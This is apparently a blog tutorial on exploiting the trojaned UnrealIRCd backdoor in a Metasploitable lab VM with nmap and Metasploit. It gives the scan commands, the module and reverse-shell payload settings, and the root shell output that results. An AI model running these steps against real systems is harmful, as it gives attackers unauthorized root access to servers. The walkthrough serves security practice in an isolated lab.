Hack Metasploitable with UnrealIRC backdoor

Metasploitable is an OS with baked in vulnerabilities for you to practice exploits using Metasploit. In this tutorial we will be taking a look at ow to gain a reverse shell on our target machine by exploiting the UnrealIRC backdoor.

What is IRC?

IRC means Internet Relay Chat, it is a messaging service that was quite popular in the early 2000’s, but since 2003 has steadily declined in use. There are however still a significant number of people using IRC, so there is a good chance you may come across this potential vulnerability. Back in June of 2010 the IRC servers were hacked and the download was replaced by a version that had been compromised with a trojan backdoor. If someone is running this version, it’s a security hole.

The nice thing about this vulnerability is that it is not a standard service that is likely to have been patched already. In a real life situation is is much more likely you will find a hole that has not been patched in a third party application than in the OS.

To begin with start up your Metasploitable virtual machine, and Kali Linux virtual machine. Then we will run nmap to see what services and ports are available.

┌──(kali㉿kali)-[~]
└─$ nmap 10.0.2.0/24 

we will see that our Metasploitable virtual machine has lots of ports and services running.

nmap scan in Kali Linux

Our target machine is on IP address 10.0.2.7 and you can see on for 6667 the IRC service is running.

Now if we run the following command

└─$ nmap --script irc-unrealircd-backdoor.nse 10.0.2.7 -p 6667

This will test if the IRC version installed is vulnerable by running a time based ping command and seeing how long it takes to respond.

nmap unrealIRC

The result printed in the terminal shows that it is likely the unrealIRCd that is installed is likely to be exploitable. We can find more details by visiting :

http://seclists.org/fulldisclosure/2010/Jun/277

So now we know that our target machine is likely to be penetrated through this service. Let’s start Metasploit by typing msfconsole

Now type search irc and you will see several results.

search vulnerability in metasploit

The one we are interested in is the unreal irc backdoor, which is number 14 on the list. So type use 14.

Now we need to decide on our payload. To see the available compatible payloads use show payloads and you will see several options for this.

show payloads for exploit

We will go with a unix reverse shell. Set the payload with set payload cmd/unix/reverse

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse

Now type options to see what settings are available.

options in metasploit

We need to set the RHOSTS and the LHOST. The LHOST is our Kali Linux IP address, the RHOSTS is the target machine IP address. You can se thee port is defaulted already to 6667.

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST 10.0.2.15
LHOST => 10.0.2.15
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 10.0.2.7
RHOSTS => 10.0.2.7

Now type options again and you should see the details are filled in.

set options in metasploit for unrealIRCd

Now it’s a simple matter of typing exploit to get the reverse shell.

unrealIRCd exploit

Now we can check that level of user access w have by typing whoami and we can see it responds with root. Meaning we have full root access to the target machine.

whoami
root
id
uid=0(root) gid=0(root)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

We can also get other information like the user ID, and the details of the system OS.

This is a pretty simple exploit to get to grips with, and shows how important it is to always run the latest versions of third party applications and your OS. IRC took down the vulnerable version immediately but not before thousands had already downloaded it.

Advertisement

One thought on “Hack Metasploitable with UnrealIRC backdoor

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: